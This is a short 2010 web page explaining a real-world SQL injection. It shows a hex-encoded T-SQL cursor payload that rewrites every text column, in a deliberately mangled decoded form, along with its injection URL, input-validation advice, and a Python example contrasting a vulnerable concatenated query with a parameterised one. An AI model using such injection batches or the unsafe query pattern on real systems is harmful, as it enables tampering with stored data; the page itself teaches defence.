
Real Life SQL Injection Attack

Last Updated: 9/15/10

Real-life example of a SQL injection command embedded in a URL:

DECLARE @S VARCHAR(4000);
SET @S=CAST(0x

This is what the hex converts to in standard text commands:

DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FR0M sysobjects a,sysclumns b WHERE a.id=b.id AND a.xtype='z' AND (b.xtype=99 OR b.xtype=35 0R b.xtype=231 0R b.xtype=137) 0PEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+X@+']))+''''') FETCH NEXT FROM Table_Cursor INTO @T,@C END CL0SE Table_Cursor DEALLOCATE Table_Cursor
Here is how it was injected into the web page:
http:// (domain name here) /asp_script_name.asp?ID=227;DECLARE%20@S%20VARCHAR(4000);SET.....

It is longer than that (see above), but you get the idea of how it was injected into the ASP file: there was no validation on the input.

As you can see, hackers can be very smart. ALWAYS validate your database input from ALL of your web pages. Remove special characters, and limit URL variables to numeric values only, which are easily validated. This applies to GET variables in your URLs and to all POST variables in your forms.
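The following is an added example, not code from the original article, that contrasts the vulnerable pattern above (the raw ID value concatenated into the SQL text) with the advised fix: accept only a digits-only ID and bind it as a query parameter. The host name, the in-memory Articles table and the truncated attack URL are constructed stand-ins.

```python
import re
import sqlite3
from urllib.parse import urlsplit, unquote

# Constructed sample requests shaped like the URL quoted above; the host is a
# placeholder and the injected tail is truncated, as it is on the page.
ATTACK_URL = ("http://example.invalid/asp_script_name.asp"
              "?ID=227;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x...")
BENIGN_URL = "http://example.invalid/asp_script_name.asp?ID=227"

ID_PATTERN = re.compile(r"[0-9]{1,9}")   # allow-list: digits only, bounded length

def get_param(url, name):
    """Decoded values of one query-string parameter; does not split on ';'."""
    found = []
    for pair in urlsplit(url).query.split("&"):
        key, _, value = pair.partition("=")
        if key == name:
            found.append(unquote(value))
    return found

def build_query_unsafe(url):
    """Vulnerable pattern: raw GET value concatenated into the SQL batch text."""
    raw = get_param(url, "ID")[0]
    return "SELECT Title FROM Articles WHERE ID=" + raw

def parse_id(url):
    """Strict numeric validation: exactly one ID value, digits only, else None."""
    values = get_param(url, "ID")
    if len(values) != 1 or ID_PATTERN.fullmatch(values[0]) is None:
        return None
    return int(values[0])

def lookup_title(conn, url):
    """Validated integer bound as a parameter; the value never touches the SQL text."""
    article_id = parse_id(url)
    if article_id is None:
        return None          # reject the request (HTTP 400, log it) instead of querying
    row = conn.execute("SELECT Title FROM Articles WHERE ID=?", (article_id,)).fetchone()
    return row[0] if row else None

def demo_db():
    """In-memory stand-in for the site's database (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Articles (ID INTEGER PRIMARY KEY, Title TEXT)")
    conn.execute("INSERT INTO Articles VALUES (227, 'Real Life SQL Injection Attack')")
    return conn
```

With the attack URL, build_query_unsafe shows the batch gaining a second statement after the ';', while lookup_title returns None before any SQL is executed.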

Please note that some of this page has been modified to protect the innocent and to prevent stupid people from using this information to attack someone.

If you want more info about this attack and how to prevent similar attacks feel free to contact me.

Helpful Links:
https://download.spidynamics.com/Products/scrawlr/
http://en.wikipedia.org/wiki/Sql_injection
http://www.codeproject.com/KB/database/SqlInjectionAttacks.aspx